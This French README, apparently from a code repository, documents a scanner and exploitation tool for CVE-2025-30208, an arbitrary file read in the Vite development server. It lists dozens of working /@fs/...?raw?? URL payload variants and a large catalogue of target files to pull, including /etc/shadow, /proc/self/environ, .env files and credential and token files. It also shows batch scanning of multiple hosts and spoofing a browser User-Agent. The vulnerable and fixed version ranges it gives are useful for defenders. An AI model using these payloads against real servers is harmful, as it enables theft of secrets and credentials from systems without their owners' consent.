
CVE‑2025‑30208 est une vulnérabilité de lecture arbitraire de fichiers de sévérité moyenne dans le serveur de développement Vite (un outil de construction frontend populaire)
Scanner de vulnérabilité avancé pour CVE-2025-30208 avec des fonctionnalités de niveau entreprise
Outil de test d'intrusion professionnel pour la détection de la vulnérabilité de lecture arbitraire de fichiers dans Vite
🚀 Démarrage rapide • 📋 Fonctionnalités • 🔧 Utilisation • 📊 Exemples • 🛡️ Sécurité
Il s'agit d'un scanner de vulnérabilité complet conçu pour détecter et exploiter la vulnérabilité CVE-2025-30208 dans les serveurs de développement Vite. La vulnérabilité permet un accès en lecture arbitraire à des fichiers via les points de terminaison du système de fichiers de Vite, exposant potentiellement des fichiers de configuration sensibles, du code source et des informations système.
L'outil dispose désormais d'une architecture modulaire pour une meilleure maintenabilité et extensibilité :
CVE-2025-30208.py - Application principale du scannerpayloads.py - Charges utiles d'exploitation avancées (60+ variations)sensitive_files.py - Base de données complète de fichiers sensibles (200+ fichiers)html_template.py - Modèle de rapport HTML amélioré de style hackerpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Activer le mode verbeux pour une sortie détaillée
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Appuyez deux fois sur Entrée pour terminer]
CVE-2025-30208 > scan
# Configurer le proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Définir des en-têtes personnalisés
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Configurer la limitation de débit
CVE-2025-30208 > rate
Enter rate limit: 1.0
# Générer un beau rapport HTML
CVE-2025-30208 > pull
# Démarrer le serveur Web pour visualiser le rapport
CVE-2025-30208 > web
# Démarrer le serveur Web sur un port spécifique
CVE-2025-30208 > web 8081
# Arrêter le serveur Web
CVE-2025-30208 > web off
Le scanner utilise désormais 60+ variations de charges utiles organisées dans payloads.py :
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
/app/{file_path}?raw??
/App/{file_path}?raw??
L'outil teste maintenant 200+ fichiers sensibles organisés dans sensitive_files.py :
/etc/passwd - Informations sur les comptes utilisateurs/etc/shadow - Données de mots de passe chiffrées/etc/services - Services réseau/etc/hosts - Mappages de noms d'hôtes/etc/fstab - Tableau du système de fichiers/etc/ssh/sshd_config - Configuration du serveur SSH/etc/crontab - Tâches cron système/etc/sudoers - Configuration sudo/proc/version - Version du noyau/proc/cpuinfo - Informations sur le CPU/proc/meminfo - Informations sur la mémoire/proc/self/environ - Environnement du processus/proc/self/cmdline - Ligne de commande du processus/proc/net/tcp - Connexions TCP/proc/net/udp - Connexions UDP.env - Variables d'environnement.env.local - Environnement local.env.production - Environnement de productionconfig.json - Configuration de l'applicationsettings.json - Paramètres de l'applicationapplication.properties - Configuration Springapplication.yml - Configuration YAMLdatabase.yml - Configuration de la base de donnéessecrets.json - Gestion des secretspackage.json - Dépendances Node.jspackage-lock.json - Dépendances verrouilléesyarn.lock - Fichier de verrouillage Yarnvite.config.js - Configuration Vitevite.config.ts - Configuration Vite TypeScripttsconfig.json - Configuration TypeScriptwebpack.config.js - Configuration Webpacknext.config.js - Configuration Next.jsnuxt.config.js - Configuration Nuxt.jsangular.json - Configuration Angularvue.config.js - Configuration Vue.jsrollup.config.js - Configuration Rollupeslint.config.js - Configuration ESLint.git/config - Configuration Git.gitignore - Règles d'ignorance Git.gitattributes - Attributs Git.gitmodules - Sous-modules Git.git/HEAD - Branche actuelle.git/logs/HEAD - Journaux Git.git/refs/heads/master - Branche master.git/refs/heads/main - Branche principaleREADME.md - Documentation du projetCHANGELOG.md - Journal des modificationsLICENSE - Informations sur la licenceCONTRIBUTING.md - Directives de contributionAUTHORS - Informations sur l'auteurTODO.md - Liste des tâchesROADMAP.md - Feuille de route du développementDockerfile - Configuration Dockerdocker-compose.yml - Docker Composedocker-compose.override.yml - Configuration de remplacement.dockerignore - Règles d'ignorance Dockerdocker-compose.prod.yml - Configuration de productiondocker-compose.dev.yml - Configuration de développementnginx.conf - Configuration Nginxapache2.conf - Configuration Apachehttpd.conf - Configuration du démon HTTP.htaccess - Contrôle d'accès Apacheweb.config - Configuration IISrobots.txt - Directives pour les moteurs de recherchesitemap.xml - Structure du sitemanifest.json - Manifeste de l'application Websw.js - Service workerfirebase.json - Configuration Firebasefirebase.rules - Règles de sécurité Firebaseboot.ini - Configuration de démarrageautoexec.bat - Script d'exécution automatiquesystem.ini - Configuration systèmewin.ini - Configuration WindowsUsers - Répertoires utilisateursWindows - Fichiers systèmeProgram Files - Répertoires d'applicationsSystem - Fichiers systèmeLibrary - Fichiers de bibliothèqueApplications - Fichiers d'applicationsprivate/etc/hosts - Fichier hostsprivate/etc/passwd - Comptes utilisateursdatabase.db - Base de données SQLitedatabase.sqlite - Base de données SQLitedata.db - Base de données de donnéesdump.sql - Dump de base de donnéesschema.sql - Schéma de base de donnéesmigrations - Migrations de base de donnéeslogs - Répertoire des journauxerror.log - Journaux d'erreursaccess.log - Journaux d'accèsapp.log - Journaux d'applicationdebug.log - Journaux de débogagecombined.log - Journaux combinésbackup - Répertoire de sauvegardebackup.sql - Sauvegarde de base de donnéesbackup.zip - Sauvegarde compresséedump - Dump de donnéesexport - Exportation de donnéesauth.json - Configuration d'authentificationcredentials.json - Stockage d'identifiantskeys.json - Gestion des cléstokens.json - Stockage de jetonsjwt.json - Configuration JWToauth.json - Configuration OAuthapi.json - Configuration APIswagger.json - Documentation APIopenapi.json - Spécification OpenAPIgraphql.json - Configuration GraphQLschema.json - Schéma APIcloudformation.yml - AWS CloudFormationserverless.yml - Configuration Serverlessterraform.tf - Configuration Terraformkubernetes.yml - Configuration Kubernetesk8s.yml - Configuration Kubernetesanalytics.json - Configuration d'analysemonitoring.json - Configuration de surveillancemetrics.json - Configuration de métriquestelemetry.json - Données de télémétrieL'outil génère maintenant de beaux rapports HTML de style hacker avec :
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
CVE-2025-30208/
├── CVE-2025-30208.py # Application principale du scanner
├── payloads.py # Charges utiles d'exploitation avancées (60+)
├── sensitive_files.py # Base de données de fichiers sensibles (200+)
├── html_template.py # Modèle de rapport HTML amélioré
├── README.md # Cette documentation
├── requirements.txt # Dépendances Python
├── logs/ # Répertoire des fichiers journaux
├── data_leak.html # Rapports HTML générés
├── data_leak.json # Rapports JSON générés
└── session.json # Configurations de session sauvegardées
Nous accueillons les contributions pour améliorer cet outil :
payloads.pysensitive_files.pyhtml_template.pyCe projet est sous licence uniquement à des fins de test de sécurité éducative et autorisée.
⚠️ Avertissement légal : Cet outil est destiné uniquement aux tests de sécurité autorisés et à des fins de recherche. Les utilisateurs sont responsables de s'assurer qu'ils disposent de l'autorisation appropriée avant de tester tout système. Les auteurs ne sont pas responsables de toute utilisation abusive de cet outil.
⭐ Si cet outil vous a aidé, veuillez lui donner une étoile ! ⭐
Construit avec ❤️ pour la communauté de la sécurité
| Commande | Description | Exemple |
|---|
set <option> <value> | Définir les options de configuration | set RHOST 192.168.1.100 |
show options | Afficher les paramètres actuels | show options |
edit | Éditeur interactif d'options | edit |
run / exploit | Exécuter le test de vulnérabilité | run |
batch | Scanner plusieurs cibles par lots | batch |
scan | Découvrir des fichiers sensibles | scan |
pull | Exporter les résultats en HTML/JSON | pull |
web [on|off|port] | Serveur Web pour les rapports HTML | web 8080 |
save | Sauvegarder la configuration de session | save |
load | Charger la configuration de session | load |
test | Tester la connectivité à la cible | test |
validate | Valider la configuration actuelle | validate |
verbose | Activer/désactiver le mode verbeux | verbose |
proxy | Configurer les paramètres de proxy | proxy |
headers | Définir des en-têtes HTTP personnalisés | headers |
rate | Configurer la limitation de débit | rate |
log | Afficher les informations de journalisation | log |
help / ? | Afficher l'aide | help |
exit / quit | Quitter l'outil | exit |
| Option | Description | Valeur par défaut | Validation |
|---|
RHOST | Adresse IP/nom d'hôte cible | - | Validation du nom d'hôte/IP |
RPORT | Numéro de port cible | - | Plage de ports (1-65535) |
FILEPATH | Chemin du fichier à tester | etc/passwd | Validation du chemin |
PROXY | URL du proxy HTTP/HTTPS | - | Validation du format URL |
VERBOSE | Activer la sortie verbeuse | false | Validation booléenne |
RATE_LIMIT | Délai entre les requêtes (secondes) | 0.3 | Validation numérique |
THREADS | Nombre de threads pour le scan par lots | 5 | Validation entière |
TIMEOUT | Délai d'attente des requêtes (secondes) | 5 | Validation entière |
CUSTOM_HEADERS | En-têtes HTTP personnalisés (JSON) | {} | Validation du format JSON |
prettier.config.js - Configuration Prettierjest.config.js - Configuration Jestbabel.config.js - Configuration Babeltailwind.config.js - Configuration Tailwind CSS| Fichier | Description | Format |
|---|
data_leak.html | Rapport de vulnérabilité HTML de style hacker amélioré | HTML |
data_leak.json | Export JSON structuré | JSON |
sensitive_files_discovery.json | Fichiers sensibles découverts | JSON |
session.json | Configuration de session sauvegardée | JSON |
logs/cve_2025_30208_YYYYMMDD_HHMMSS.log | Journaux d'audit détaillés | Texte |